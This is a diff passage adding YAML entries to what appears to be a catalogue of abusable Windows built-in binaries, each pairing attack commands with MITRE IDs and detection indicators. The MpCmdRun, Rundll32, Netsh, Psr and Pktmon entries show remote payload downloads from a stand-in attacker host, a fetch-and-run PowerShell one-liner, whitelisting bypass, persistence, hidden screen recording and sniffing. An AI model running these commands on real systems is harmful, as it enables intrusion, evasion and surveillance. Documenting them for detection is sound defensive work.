- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_8c1fc948b5a01c52\
|
||||||
|
- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_9088b61921a6ff9f\
|
||||||
|
- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_90f68cd0dc48b625\
|
||||||
|
- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_95cb371d046d4b4c\
|
||||||
|
- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_a58de0cf5f3e9dca\
|
||||||
|
- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_abe9d37302f8b1ae\
|
||||||
|
- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_acb3edda7b82982f\
|
||||||
|
- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_aebc5a8535dd3184\
|
||||||
|
- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_b5d4c82c67b39358\
|
||||||
|
- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_b846bbf1e81ea3cf\
|
||||||
|
- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_babb2e8b8072ff3b\
|
||||||
|
- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_bc75cebf5edbbc50\
|
||||||
|
- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_be91293cf20d4372\
|
||||||
|
- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_c11f4d5f0bc4c592\
|
||||||
|
- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_c4e5173126d31cf0\
|
||||||
|
- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_c4f600ffe34acc7b\
|
||||||
|
- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_c8634ed19e331cda\
|
||||||
|
- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_c9081e50bcffa972\
|
||||||
|
- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_ceddadac8a2b489e\
|
||||||
|
- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_d4406f0ad6ec2581\
|
||||||
|
- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_d5877a2e0e6374b6\
|
||||||
|
- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_d8ca5f86add535ef\
|
||||||
|
- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_e8abe176c7b553b5\
|
||||||
|
- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_eabb3ac2c517211f\
|
||||||
|
- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_f8d8be8fea71e1a0\
|
||||||
|
- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_fe5e116bb07c0629\
|
||||||
|
- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_fe73d2ebaa05fb95\
|
||||||
|
- Path: c:\windows\system32\driverstore\filerepository\igdlh64_kbl_kit127397.inf_amd64_e1da8ee9e92ccadb\
|
||||||
|
- Path: c:\windows\system32\driverstore\filerepository\k127153.inf_amd64_364f43f2a27f7bd7\
|
||||||
|
- Path: c:\windows\system32\driverstore\filerepository\k127153.inf_amd64_3f3936d8dec668b8\
|
||||||
|
- Path: c:\windows\system32\driverstore\filerepository\k127793.inf_amd64_3ab7883eddccbf0f\
|
||||||
|
- Path: c:\windows\system32\driverstore\filerepository\ki129523.inf_amd64_32947eecf8f3e231\
|
||||||
|
- Path: c:\windows\system32\driverstore\filerepository\ki126950.inf_amd64_fa7f56314967630d\
|
||||||
|
- Path: c:\windows\system32\driverstore\filerepository\ki126951.inf_amd64_94804e3918169543\
|
||||||
|
- Path: c:\windows\system32\driverstore\filerepository\ki126973.inf_amd64_06dde156632145e3\
|
||||||
|
- Path: c:\windows\system32\driverstore\filerepository\ki126974.inf_amd64_9168fc04b8275db9\
|
||||||
|
- Path: c:\windows\system32\driverstore\filerepository\ki127005.inf_amd64_753576c4406c1193\
|
||||||
|
- Path: c:\windows\system32\driverstore\filerepository\ki127018.inf_amd64_0f67ff47e9e30716\
|
||||||
|
- Path: c:\windows\system32\driverstore\filerepository\ki127021.inf_amd64_0d68af55c12c7c17\
|
||||||
|
- Path: c:\windows\system32\driverstore\filerepository\ki127171.inf_amd64_368f8c7337214025\
|
||||||
|
- Path: c:\windows\system32\driverstore\filerepository\ki127176.inf_amd64_86c658cabfb17c9c\
|
||||||
|
- Path: c:\windows\system32\driverstore\filerepository\ki127390.inf_amd64_e1ccb879ece8f084\
|
||||||
|
- Path: c:\windows\system32\driverstore\filerepository\ki127678.inf_amd64_8427d3a09f47dfc1\
|
||||||
|
- Path: c:\windows\system32\driverstore\filerepository\ki127727.inf_amd64_cf8e31692f82192e\
|
||||||
|
- Path: c:\windows\system32\driverstore\filerepository\ki127807.inf_amd64_fc915899816dbc5d\
|
||||||
|
- Path: c:\windows\system32\driverstore\filerepository\ki127850.inf_amd64_6ad8d99023b59fd5\
|
||||||
|
- Path: c:\windows\system32\driverstore\filerepository\ki128602.inf_amd64_6ff790822fd674ab\
|
||||||
|
- Path: c:\windows\system32\driverstore\filerepository\ki128916.inf_amd64_3509e1eb83b83cfb\
|
||||||
|
- Path: c:\windows\system32\driverstore\filerepository\ki129407.inf_amd64_f26f36ac54ce3076\
|
||||||
|
- Path: c:\windows\system32\driverstore\filerepository\ki129633.inf_amd64_d9b8af875f664a8c\
|
||||||
|
- Path: c:\windows\system32\driverstore\filerepository\ki129866.inf_amd64_e7cdca9882c16f55\
|
||||||
|
- Path: c:\windows\system32\driverstore\filerepository\ki130274.inf_amd64_bafd2440fa1ffdd6\
|
||||||
|
- Path: c:\windows\system32\driverstore\filerepository\ki130350.inf_amd64_696b7c6764071b63\
|
||||||
|
- Path: c:\windows\system32\driverstore\filerepository\ki130409.inf_amd64_0d8d61270dfb4560\
|
||||||
|
- Path: c:\windows\system32\driverstore\filerepository\ki130471.inf_amd64_26ad6921447aa568\
|
||||||
|
- Path: c:\windows\system32\driverstore\filerepository\ki130624.inf_amd64_d85487143eec5e1a\
|
||||||
|
- Path: c:\windows\system32\driverstore\filerepository\ki130825.inf_amd64_ee3ba427c553f15f\
|
||||||
|
- Path: c:\windows\system32\driverstore\filerepository\ki130871.inf_amd64_382f7c369d4bf777\
|
||||||
|
- Path: c:\windows\system32\driverstore\filerepository\ki131064.inf_amd64_5d13f27a9a9843fa\
|
||||||
|
- Path: c:\windows\system32\driverstore\filerepository\ki131176.inf_amd64_fb4fe914575fdd15\
|
||||||
|
- Path: c:\windows\system32\driverstore\filerepository\ki131191.inf_amd64_d668106cb6f2eae0\
|
||||||
|
- Path: c:\windows\system32\driverstore\filerepository\ki131622.inf_amd64_0058d71ace34db73\
|
||||||
|
- Path: c:\windows\system32\driverstore\filerepository\ki132032.inf_amd64_f29660d80998e019\
|
||||||
|
- Path: c:\windows\system32\driverstore\filerepository\ki132337.inf_amd64_223d6831ffa64ab1\
|
||||||
|
- Path: c:\windows\system32\driverstore\filerepository\ki132535.inf_amd64_7875dff189ab2fa2\
|
||||||
|
- Path: c:\windows\system32\driverstore\filerepository\ki132544.inf_amd64_b8c1f31373153db4\
|
||||||
|
- Path: c:\windows\system32\driverstore\filerepository\ki132574.inf_amd64_54c9b905b975ee55\
|
||||||
|
- Path: c:\windows\system32\driverstore\filerepository\ki132869.inf_amd64_052eb72d070df60f\
|
||||||
|
- Path: c:\windows\system32\driverstore\filerepository\kit126731.inf_amd64_1905c9d5f38631d9\
|
||||||
|
Detection:
|
||||||
|
- IOC: Usually GfxDownloadWrapper downloads a JSON file from https://gameplayapi.intel.com.
|
||||||
|
Resources:
|
||||||
|
- Link: https://www.sothis.tech/author/jgalvez/
|
||||||
|
Acknowledgement:
|
||||||
|
- Person: Jesus Galvez
|
||||||
|
Handle:
|
||||||
|
---
|
34
yml/OSBinaries/Ilasm.yml
Normal file
34
yml/OSBinaries/Ilasm.yml
Normal file
@ -0,0 +1,34 @@
|
|||||||
|
---
|
||||||
|
Name: Ilasm.exe
|
||||||
|
Description: used for compile c# code into dll or exe.
|
||||||
|
Author: Hai vaknin (lux)
|
||||||
|
Created: 17/03/2020
|
||||||
|
Commands:
|
||||||
|
- Command: ilasm.exe C:\public\test.txt /exe
|
||||||
|
Description: Binary file used by .NET to compile c# code to .exe
|
||||||
|
Usecase: Compile attacker code on system. Bypass defensive counter measures.
|
||||||
|
Category: Compile
|
||||||
|
Privileges: User
|
||||||
|
MitreID: T1127
|
||||||
|
MitreLink: https://attack.mitre.org/techniques/T1127/
|
||||||
|
OperatingSystem: Windows 10,7
|
||||||
|
- Command: ilasm.exe C:\public\test.txt /dll
|
||||||
|
Description: Binary file used by .NET to compile c# code to dll
|
||||||
|
Usecase: A description of the usecase
|
||||||
|
Category: Compile
|
||||||
|
Privileges: User
|
||||||
|
MitreID: T1127
|
||||||
|
MitreLink: https://attack.mitre.org/techniques/T1127/
|
||||||
|
Full_Path:
|
||||||
|
- Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe
|
||||||
|
- Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe
|
||||||
|
Code_Sample:
|
||||||
|
- Code:
|
||||||
|
Resources:
|
||||||
|
- Link: https://github.com/LuxNoBulIshit/BeforeCompileBy-ilasm/blob/master/hello_world.txt
|
||||||
|
Acknowledgement:
|
||||||
|
- Person: Hai Vaknin(Lux)
|
||||||
|
Handle: '@VakninHai'
|
||||||
|
- Person: Lior Adar
|
||||||
|
Handle:
|
||||||
|
---
|
57
yml/OSBinaries/MpCmdRun.yml
Normal file
57
yml/OSBinaries/MpCmdRun.yml
Normal file
@ -0,0 +1,57 @@
|
|||||||
|
---
|
||||||
|
Name: MpCmdRun.exe
|
||||||
|
Description: Binary part of Windows Defender. Used to manage settings in Windows Defender
|
||||||
|
Author: 'Oddvar Moe'
|
||||||
|
Created: '09/03/2020'
|
||||||
|
Commands:
|
||||||
|
- Command: MpCmdRun.exe -DownloadFile -url https://attacker.server/beacon.exe -path c:\\temp\\beacon.exe
|
||||||
|
Description: Download file to specified path - Slashes work as well as dashes (/DownloadFile, /url, /path)
|
||||||
|
Usecase: Download file
|
||||||
|
Category: Download
|
||||||
|
Privileges: User
|
||||||
|
MitreID: T1105
|
||||||
|
MitreLink: https://attack.mitre.org/wiki/Technique/T1105
|
||||||
|
OperatingSystem: Windows 10
|
||||||
|
- Command: copy "C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\MpCmdRun.exe" C:\Users\Public\Downloads\MP.exe && chdir "C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\" && "C:\Users\Public\Downloads\MP.exe" -DownloadFile -url https://attacker.server/beacon.exe -path C:\Users\Public\Downloads\evil.exe
|
||||||
|
Description: Download file to specified path - Slashes work as well as dashes (/DownloadFile, /url, /path) [updated version to bypass Windows 10 mitigation]
|
||||||
|
Usecase: Download file
|
||||||
|
Category: Download
|
||||||
|
Privileges: User
|
||||||
|
MitreID: T1105
|
||||||
|
MitreLink: https://attack.mitre.org/wiki/Technique/T1105
|
||||||
|
OperatingSystem: Windows 10
|
||||||
|
- Command: MpCmdRun.exe -DownloadFile -url https://attacker.server/beacon.exe -path c:\\temp\\nicefile.txt:evil.exe
|
||||||
|
Description: Download file to machine and store it in Alternate Data Stream
|
||||||
|
Usecase: Hide downloaded data inton an Alternate Data Stream
|
||||||
|
Category: ADS
|
||||||
|
Privileges: User
|
||||||
|
MitreID: T1096
|
||||||
|
MitreLink: https://attack.mitre.org/wiki/Technique/T1096
|
||||||
|
OperatingSystem: Windows 10
|
||||||
|
Full_Path:
|
||||||
|
- Path: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.4-0\MpCmdRun.exe
|
||||||
|
- Path: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.7-0\MpCmdRun.exe
|
||||||
|
- Path: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\MpCmdRun.exe
|
||||||
|
Code_Sample:
|
||||||
|
- Code:
|
||||||
|
Detection:
|
||||||
|
- IOC: MpCmdRun storing data into alternate data streams.
|
||||||
|
- IOC: MpCmdRun getting a file from a remote machine or the internet that is not expected.
|
||||||
|
- IOC: Monitor process creation for non-SYSTEM and non-LOCAL SERVICE accounts launching mpcmdrun.exe.
|
||||||
|
- IOC: Monitor for the creation of %USERPROFILE%\AppData\Local\Temp\MpCmdRun.log
|
||||||
|
- IOC: User Agent is "MpCommunication"
|
||||||
|
Resources:
|
||||||
|
- Link: https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-antivirus/command-line-arguments-microsoft-defender-antivirus
|
||||||
|
- Link: https://twitter.com/mohammadaskar2/status/1301263551638761477
|
||||||
|
- Link: https://twitter.com/Oddvarmoe/status/1301444858910052352
|
||||||
|
- Link: https://twitter.com/NotMedic/status/1301506813242867720
|
||||||
|
Acknowledgement:
|
||||||
|
- Person: Askar
|
||||||
|
Handle: '@mohammadaskar2'
|
||||||
|
- Person: Oddvar Moe
|
||||||
|
Handle: '@oddvarmoe'
|
||||||
|
- Person: RichRumble
|
||||||
|
Handle: ''
|
||||||
|
- Person: Cedric
|
||||||
|
Handle: '@th3c3dr1c'
|
||||||
|
---
|
35
yml/OSBinaries/Netsh.yml
Normal file
35
yml/OSBinaries/Netsh.yml
Normal file
@ -0,0 +1,35 @@
|
|||||||
|
---
|
||||||
|
Name: Netsh.exe
|
||||||
|
Description: Netsh is a Windows tool used to manipulate network interface settings.
|
||||||
|
Author: 'Freddie Barr-Smith'
|
||||||
|
Created: '2019-12-24'
|
||||||
|
Commands:
|
||||||
|
- Command: netsh.exe add helper C:\Users\User\file.dll
|
||||||
|
Description: Use Netsh in order to execute a .dll file and also gain persistence, every time the netsh command is called
|
||||||
|
Usecase: Proxy execution of .dll
|
||||||
|
Category: Execute
|
||||||
|
Privileges: User
|
||||||
|
MitreID: T1128
|
||||||
|
MitreLink: https://attack.mitre.org/techniques/T1128/
|
||||||
|
OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
|
Full_Path:
|
||||||
|
- Path: C:\WINDOWS\System32\Netsh.exe
|
||||||
|
- Path: C:\WINDOWS\SysWOW64\Netsh.exe
|
||||||
|
Code_Sample:
|
||||||
|
- Code:
|
||||||
|
Detection:
|
||||||
|
- IOC: Netsh initiating a network connection
|
||||||
|
Resources:
|
||||||
|
- Link: https://freddiebarrsmith.com/trix/trix.html
|
||||||
|
- Link: https://htmlpreview.github.io/?https://github.com/MatthewDemaske/blogbackup/blob/master/netshell.html
|
||||||
|
- Link: https://liberty-shell.com/sec/2018/07/28/netshlep/
|
||||||
|
Acknowledgement:
|
||||||
|
- Person: 'Freddie Barr-Smith'
|
||||||
|
Handle:
|
||||||
|
- Person: 'Riccardo Spolaor'
|
||||||
|
Handle:
|
||||||
|
- Person: 'Mariano Graziano'
|
||||||
|
Handle:
|
||||||
|
- Person: 'Xabier Ugarte-Pedrero'
|
||||||
|
Handle:
|
||||||
|
---
|
35
yml/OSBinaries/Pktmon.yml
Normal file
35
yml/OSBinaries/Pktmon.yml
Normal file
@ -0,0 +1,35 @@
|
|||||||
|
---
|
||||||
|
Name: Pktmon.exe
|
||||||
|
Description: Capture Network Packets on the windows 10 with October 2018 Update or later.
|
||||||
|
Author: 'Derek Johnson'
|
||||||
|
Created: '2020-08-12'
|
||||||
|
Commands:
|
||||||
|
- Command: pktmon.exe start --etw
|
||||||
|
Description: Will start a packet capture and store log file as PktMon.etl. Use pktmon.exe stop
|
||||||
|
Usecase: use this a built in network sniffer on windows 10 to capture senstive traffic
|
||||||
|
Category: Reconnaissance
|
||||||
|
Privileges: Administrator
|
||||||
|
MitreID: T1040
|
||||||
|
MitreLink: https://attack.mitre.org/wiki/Technique/T1040
|
||||||
|
OperatingSystem: Windows 10 1809 and later
|
||||||
|
- Command: pktmon.exe filter add -p 445
|
||||||
|
Description: Select Desired ports for packet capture
|
||||||
|
Usecase: Look for interesting traffic such as telent or FTP
|
||||||
|
Category: Reconnaissance
|
||||||
|
Privileges: Administrator
|
||||||
|
MitreID: T1040
|
||||||
|
MitreLink: https://attack.mitre.org/wiki/Technique/T1040
|
||||||
|
OperatingSystem: Windows 10 1809 and later
|
||||||
|
Full_Path:
|
||||||
|
- Path: c:\windows\system32\pktmon.exe
|
||||||
|
- Path: c:\windows\syswow64\pktmon.exe
|
||||||
|
Code_Sample:
|
||||||
|
- Code:
|
||||||
|
Detection:
|
||||||
|
- IOC: .etl files found on system
|
||||||
|
Resources:
|
||||||
|
- Link: https://binar-x79.com/windows-10-secret-sniffer/
|
||||||
|
Acknowledgement:
|
||||||
|
- Person: Derek Johnson
|
||||||
|
Handle: ''
|
||||||
|
---
|
28
yml/OSBinaries/Psr.yml
Normal file
28
yml/OSBinaries/Psr.yml
Normal file
@ -0,0 +1,28 @@
|
|||||||
|
---
|
||||||
|
Name: Psr.exe
|
||||||
|
Description: Windows Problem Steps Recorder, used to record screen and clicks.
|
||||||
|
Author: Leon Rodenko
|
||||||
|
Created: '2020-06-27'
|
||||||
|
Commands:
|
||||||
|
- Command: psr.exe /start /output D:\test.zip /sc 1 /gui 0
|
||||||
|
Description: Record a user screen without creating a GUI. You should use "psr.exe /stop" to stop recording and create output file.
|
||||||
|
Usecase: Can be used to take screenshots of the user environment
|
||||||
|
Category: Reconnaissance
|
||||||
|
Privileges: User
|
||||||
|
MitreID: T1113
|
||||||
|
MitreLink: https://attack.mitre.org/techniques/T1113/
|
||||||
|
OperatingSystem: since Windows 7 (client) / Windows 2008 R2
|
||||||
|
Full_Path:
|
||||||
|
- Path: c:\windows\system32\psr.exe
|
||||||
|
- Path: c:\windows\syswow64\psr.exe
|
||||||
|
Code_Sample:
|
||||||
|
- Code:
|
||||||
|
Detection:
|
||||||
|
- IOC: psr.exe spawned
|
||||||
|
- IOC: suspicious activity when running with "/gui 0" flag
|
||||||
|
Resources:
|
||||||
|
- Link: https://social.technet.microsoft.com/wiki/contents/articles/51722.windows-problem-steps-recorder-psr-quick-and-easy-documenting-of-your-steps-and-procedures.aspx
|
||||||
|
Acknowledgement:
|
||||||
|
- Person: Leon Rodenko
|
||||||
|
Handle: '@L3m0nada'
|
||||||
|
---
|
27
yml/OSBinaries/Rasautou.yml
Normal file
27
yml/OSBinaries/Rasautou.yml
Normal file
@ -0,0 +1,27 @@
|
|||||||
|
---
|
||||||
|
Name: Rasautou.exe
|
||||||
|
Description: Windows Remote Access Dialer
|
||||||
|
Author: 'Tony Lambert'
|
||||||
|
Created: '2020-01-10'
|
||||||
|
Commands:
|
||||||
|
- Command: rasautou -d powershell.dll -p powershell -a a -e e
|
||||||
|
Description: Loads the target .DLL specified in -d and executes the export specified in -p. Options removed in Windows 10.
|
||||||
|
Usecase: Execute DLL code
|
||||||
|
Category: Execute
|
||||||
|
Privileges: User, Administrator in Windows 8
|
||||||
|
MitreID: T1218
|
||||||
|
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
||||||
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1
|
||||||
|
Full_Path:
|
||||||
|
- Path: C:\Windows\System32\rasautou.exe
|
||||||
|
Code_Sample:
|
||||||
|
- Code:
|
||||||
|
Detection:
|
||||||
|
- IOC: rasautou.exe command line containing -d and -p
|
||||||
|
Resources:
|
||||||
|
- Link: https://github.com/fireeye/DueDLLigence
|
||||||
|
- Link: https://www.fireeye.com/blog/threat-research/2019/10/staying-hidden-on-the-endpoint-evading-detection-with-shellcode.html
|
||||||
|
Acknowledgement:
|
||||||
|
- Person: FireEye
|
||||||
|
Handle: '@FireEye'
|
||||||
|
---
|
@ -8,12 +8,12 @@ Commands:
|
|||||||
Description: Loads the target .DLL file and executes the RegisterClass function.
|
Description: Loads the target .DLL file and executes the RegisterClass function.
|
||||||
Usecase: Execute code and bypass Application whitelisting
|
Usecase: Execute code and bypass Application whitelisting
|
||||||
Category: AWL bypass
|
Category: AWL bypass
|
||||||
Privileges: User
|
Privileges: Local Admin
|
||||||
MitreID: T1121
|
MitreID: T1121
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1121
|
MitreLink: https://attack.mitre.org/wiki/Technique/T1121
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
- Command: regasm.exe AllTheThingsx64.dll
|
- Command: regasm.exe /U AllTheThingsx64.dll
|
||||||
Description: Loads the target .DLL file and executes the RegisterClass function.
|
Description: Loads the target .DLL file and executes the UnRegisterClass function.
|
||||||
Usecase: Execute code and bypass Application whitelisting
|
Usecase: Execute code and bypass Application whitelisting
|
||||||
Category: Execute
|
Category: Execute
|
||||||
Privileges: User
|
Privileges: User
|
||||||
|
27
yml/OSBinaries/Regini.yml
Normal file
27
yml/OSBinaries/Regini.yml
Normal file
@ -0,0 +1,27 @@
|
|||||||
|
---
|
||||||
|
Name: Regini.exe
|
||||||
|
Description: Used to manipulate the registry
|
||||||
|
Author: 'Oddvar Moe'
|
||||||
|
Created: '2020-07-03'
|
||||||
|
Commands:
|
||||||
|
- Command: regini.exe newfile.txt:hidden.ini
|
||||||
|
Description: Write registry keys from data inside the Alternate data stream.
|
||||||
|
Usecase: Write to registry
|
||||||
|
Category: ADS
|
||||||
|
Privileges: User
|
||||||
|
MitreID: T1096
|
||||||
|
MitreLink: https://attack.mitre.org/wiki/Technique/T1096
|
||||||
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
|
Full_Path:
|
||||||
|
- Path: C:\Windows\System32\regini.exe
|
||||||
|
- Path: C:\Windows\SysWOW64\regini.exe
|
||||||
|
Code_Sample:
|
||||||
|
- Code:
|
||||||
|
Detection:
|
||||||
|
- IOC: regini.exe reading from ADS
|
||||||
|
Resources:
|
||||||
|
- Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
|
||||||
|
Acknowledgement:
|
||||||
|
- Person: Eli Salem
|
||||||
|
Handle: '@elisalem9'
|
||||||
|
---
|
@ -8,7 +8,7 @@ Commands:
|
|||||||
Description: Loads the target .DLL file and executes the RegisterClass function.
|
Description: Loads the target .DLL file and executes the RegisterClass function.
|
||||||
Usecase: Execute dll file and bypass Application whitelisting
|
Usecase: Execute dll file and bypass Application whitelisting
|
||||||
Category: Execute
|
Category: Execute
|
||||||
Privileges: User
|
Privileges: Local Admin
|
||||||
MitreID: T1121
|
MitreID: T1121
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1121
|
MitreLink: https://attack.mitre.org/wiki/Technique/T1121
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
@ -16,7 +16,7 @@ Commands:
|
|||||||
Description: Loads the target .DLL file and executes the RegisterClass function.
|
Description: Loads the target .DLL file and executes the RegisterClass function.
|
||||||
Usecase: Execute dll file and bypass Application whitelisting
|
Usecase: Execute dll file and bypass Application whitelisting
|
||||||
Category: AWL bypass
|
Category: AWL bypass
|
||||||
Privileges: User
|
Privileges: Local Admin
|
||||||
MitreID: T1121
|
MitreID: T1121
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1121
|
MitreLink: https://attack.mitre.org/wiki/Technique/T1121
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
|
@ -12,6 +12,14 @@ Commands:
|
|||||||
MitreID: T1085
|
MitreID: T1085
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1085
|
MitreLink: https://attack.mitre.org/wiki/Technique/T1085
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
|
- Command: rundll32.exe \\10.10.10.10\share\payload.dll,EntryPoint
|
||||||
|
Description: Use Rundll32.exe to execute a DLL from a SMB share. EntryPoint is the name of the entry point in the .DLL file to execute.
|
||||||
|
Usecase: Execute DLL from SMB share.
|
||||||
|
Category: Execute
|
||||||
|
Privileges: User
|
||||||
|
MitreID: T1085
|
||||||
|
MitreLink: https://attack.mitre.org/techniques/T1085
|
||||||
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
- Command: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://ip:port/');"
|
- Command: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://ip:port/');"
|
||||||
Description: Use Rundll32.exe to execute a JavaScript script that runs a PowerShell script that is downloaded from a remote web site.
|
Description: Use Rundll32.exe to execute a JavaScript script that runs a PowerShell script that is downloaded from a remote web site.
|
||||||
Usecase: Execute code from Internet
|
Usecase: Execute code from Internet
|
||||||
@ -73,6 +81,8 @@ Resources:
|
|||||||
- Link: https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/
|
- Link: https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/
|
||||||
- Link: https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/
|
- Link: https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/
|
||||||
- Link: https://bohops.com/2018/06/28/abusing-com-registry-structure-clsid-localserver32-inprocserver32/
|
- Link: https://bohops.com/2018/06/28/abusing-com-registry-structure-clsid-localserver32-inprocserver32/
|
||||||
|
- Link: https://github.com/sailay1996/expl-bin/blob/master/obfus.md
|
||||||
|
- Link: https://github.com/sailay1996/misc-bin/blob/master/rundll32.md
|
||||||
Acknowledgement:
|
Acknowledgement:
|
||||||
- Person: Casey Smith
|
- Person: Casey Smith
|
||||||
Handle: '@subtee'
|
Handle: '@subtee'
|
||||||
@ -80,4 +90,8 @@ Acknowledgement:
|
|||||||
Handle: '@oddvarmoe'
|
Handle: '@oddvarmoe'
|
||||||
- Person: Jimmy
|
- Person: Jimmy
|
||||||
Handle: '@bohops'
|
Handle: '@bohops'
|
||||||
|
- Person: Sailay
|
||||||
|
Handle: '@404death'
|
||||||
|
- Person: Martin Ingesen
|
||||||
|
Handle: '@Mrtn9'
|
||||||
---
|
---
|
||||||
|
38
yml/OSBinaries/Ttdinject.yml
Normal file
38
yml/OSBinaries/Ttdinject.yml
Normal file
@ -0,0 +1,38 @@
|
|||||||
|
---
|
||||||
|
Name: Ttdinject.exe
|
||||||
|
Description: Used by Windows 1809 and newer to Debug Time Travel (Underlying call of tttracer.exe)
|
||||||
|
Author: 'Maxime Nadeau'
|
||||||
|
Created: '2020-05-12'
|
||||||
|
Commands:
|
||||||
|
- Command: TTDInject.exe /ClientParams "7 tmp.run 0 0 0 0 0 0 0 0 0 0" /Launch "C:/Windows/System32/calc.exe"
|
||||||
|
Description: Execute calc using ttdinject.exe. Requires administrator privileges. A log file will be created in tmp.run. The log file can be changed, but the length (7) has to be updated.
|
||||||
|
Usecase: Spawn process using other binary
|
||||||
|
Category: Execute
|
||||||
|
Privileges: Administrator
|
||||||
|
MitreID: T1218
|
||||||
|
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
||||||
|
OperatingSystem: Windows 10 2004
|
||||||
|
- Command: ttdinject.exe /ClientScenario TTDRecorder /ddload 0 /ClientParams "7 tmp.run 0 0 0 0 0 0 0 0 0 0" /launch "C:/Windows/System32/calc.exe"
|
||||||
|
Description: Execute calc using ttdinject.exe. Requires administrator privileges. A log file will be created in tmp.run. The log file can be changed, but the length (7) has to be updated.
|
||||||
|
Usecase: Spawn process using other binary
|
||||||
|
Category: Execute
|
||||||
|
Privileges: Administrator
|
||||||
|
MitreID: T1218
|
||||||
|
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
||||||
|
OperatingSystem: Windows 10 1909
|
||||||
|
Full_Path:
|
||||||
|
- Path: C:\Windows\System32\ttdinject.exe
|
||||||
|
- Path: C:\Windows\Syswow64\ttdinject.exe
|
||||||
|
Code_Sample:
|
||||||
|
- Code:
|
||||||
|
Detection:
|
||||||
|
- IOC: Parent child relationship. Ttdinject.exe parent for executed command
|
||||||
|
- IOC: Multiple queries made to the IFEO registry key of an untrusted executable (Ex. "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\payload.exe") from the ttdinject.exe process
|
||||||
|
Resources:
|
||||||
|
- Link: https://twitter.com/Oddvarmoe/status/1196333160470138880
|
||||||
|
Acknowledgement:
|
||||||
|
- Person: Oddvar Moe
|
||||||
|
Handle: '@oddvarmoe'
|
||||||
|
- Person: Maxime Nadeau
|
||||||
|
Handle: '@m_nad0'
|
||||||
|
---
|
33
yml/OSBinaries/Vbc.yml
Normal file
33
yml/OSBinaries/Vbc.yml
Normal file
@ -0,0 +1,33 @@
|
|||||||
|
---
|
||||||
|
Name: vbc.exe
|
||||||
|
Description: Binary file used for compile vbs code
|
||||||
|
Author: Lior Adar
|
||||||
|
Created: 27/02/2020
|
||||||
|
Commands:
|
||||||
|
